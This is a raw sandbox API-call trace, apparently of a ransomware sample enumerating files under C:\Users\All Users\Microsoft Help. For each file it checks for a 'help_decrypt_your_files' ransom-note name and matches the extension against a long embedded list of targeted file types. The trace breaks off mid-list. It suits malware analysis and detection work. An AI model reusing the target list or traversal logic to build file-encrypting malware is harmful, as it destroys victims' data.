	[0177.895] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.SKYPEFB_ONLINEG.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_ONLINEG.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_ONLINEG.16.1033.hxn"
	[0177.895] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_ONLINEG.16.1033.hxn") returned 64
	[0177.895] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.895] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB_ONLINEG.16.1033.hxn", cchLength=0x40 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.skypefb_onlineg.16.1033.hxn") returned 0x40
	[0177.895] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.896] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.skypefb_onlineg.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.896] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.skypefb_onlineg.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.skypefb_onlineg.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.skypefb_onlineg.16.1033.hxn"
	[0177.896] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.skypefb_onlineg.16.1033.hxn") returned 64
	[0177.896] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.896] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.896] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.897] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.897] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.897] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x53a1eec1, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x53a1eec1, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x53ac149f, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x1b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SPREADSHEETCOMPARE.16.1033.hxn", cAlternateFileName="MSSPRE~1.HXN")) returned 1
	[0177.897] lstrcmpW (lpString1="MS.SPREADSHEETCOMPARE.16.1033.hxn", lpString2="..") returned 1
	[0177.897] lstrcmpW (lpString1="MS.SPREADSHEETCOMPARE.16.1033.hxn", lpString2=".") returned 1
	[0177.897] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.897] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.SPREADSHEETCOMPARE.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.SPREADSHEETCOMPARE.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.SPREADSHEETCOMPARE.16.1033.hxn"
	[0177.897] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.SPREADSHEETCOMPARE.16.1033.hxn") returned 67
	[0177.898] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.898] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.SPREADSHEETCOMPARE.16.1033.hxn", cchLength=0x43 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.spreadsheetcompare.16.1033.hxn") returned 0x43
	[0177.898] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.898] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.spreadsheetcompare.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.898] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.spreadsheetcompare.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.spreadsheetcompare.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.spreadsheetcompare.16.1033.hxn"
	[0177.898] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.spreadsheetcompare.16.1033.hxn") returned 67
	[0177.898] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.898] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.899] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.899] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.899] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.899] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x6501dec7, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x6501dec7, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x650b07ef, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.WINWORD.16.1033.hxn", cAlternateFileName="MSWINW~1.HXN")) returned 1
	[0177.899] lstrcmpW (lpString1="MS.WINWORD.16.1033.hxn", lpString2="..") returned 1
	[0177.899] lstrcmpW (lpString1="MS.WINWORD.16.1033.hxn", lpString2=".") returned 1
	[0177.899] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.900] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.WINWORD.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.16.1033.hxn"
	[0177.900] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.16.1033.hxn") returned 56
	[0177.900] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.900] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.16.1033.hxn", cchLength=0x38 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.winword.16.1033.hxn") returned 0x38
	[0177.900] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.900] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.winword.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.900] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.winword.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.winword.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.winword.16.1033.hxn"
	[0177.901] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.winword.16.1033.hxn") returned 56
	[0177.901] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.902] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.902] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.902] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.902] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.re